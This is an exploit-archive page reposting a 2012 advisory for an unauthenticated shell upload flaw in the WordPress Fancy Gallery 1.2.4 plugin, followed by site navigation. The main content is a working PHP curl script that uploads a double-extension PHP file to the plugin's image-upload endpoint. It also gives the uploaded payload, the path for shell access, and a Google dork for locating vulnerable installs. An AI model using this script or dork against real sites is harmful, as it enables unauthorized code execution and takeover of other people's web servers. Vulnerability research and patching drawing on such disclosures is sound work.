WordPress Fancy Gallery 1.2.4 Shell Upload

WordPress Fancy Gallery 1.2.4 Shell Upload: Posted Jun 23, 2012; Authored by Sammy FORGIT; WordPress Fancy Gallery third party module version 1.2.4 suffers from an unauthenticated remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | 8a2fb5b1f4ae8ecef95b382c7596ce5d79fb9b70f251562bb8aec2f2af9f5f9e; Download | Favorite | View

WordPress Fancy Gallery 1.2.4 Shell Upload

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Sammy FORGIT member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Wordpress Plugins - Fancy Gallery Arbitrary File Upload Vulnerability
# Version : 1.2.4
# link : http://codecanyon.net/item/fancy-gallery-wordpress-plugin/400535
# Price : 18$
# Date : 22-06-2012
# Google Dork : inurl:/wp-content/plugins/radykal-fancy-gallery/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

<?php

$uploadfile="lo.php.gif";

$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>

Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/radykal-fancy-gallery/admin/
Filename : $postResult output

lo.php.gif
<?php
phpinfo();
?>


# Site : 1337day.com Inj3ct0r Exploit Database

Top Authors In Last 30 Days

Red Hat 240 files
Ubuntu 63 files
Debian 21 files
LiquidWorm 14 files
Apple 9 files
Gentoo 8 files
Alter Prime 3 files
EQSTLab 2 files
Yehia Elghaly 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,168)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,979)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,006)
UNIX (9,479)
UnixWare (188)
Windows (6,785)
Other

WordPress Fancy Gallery 1.2.4 Shell Upload

WordPress Fancy Gallery 1.2.4 Shell Upload

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Fancy Gallery 1.2.4 Shell Upload

Share This

WordPress Fancy Gallery 1.2.4 Shell Upload

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems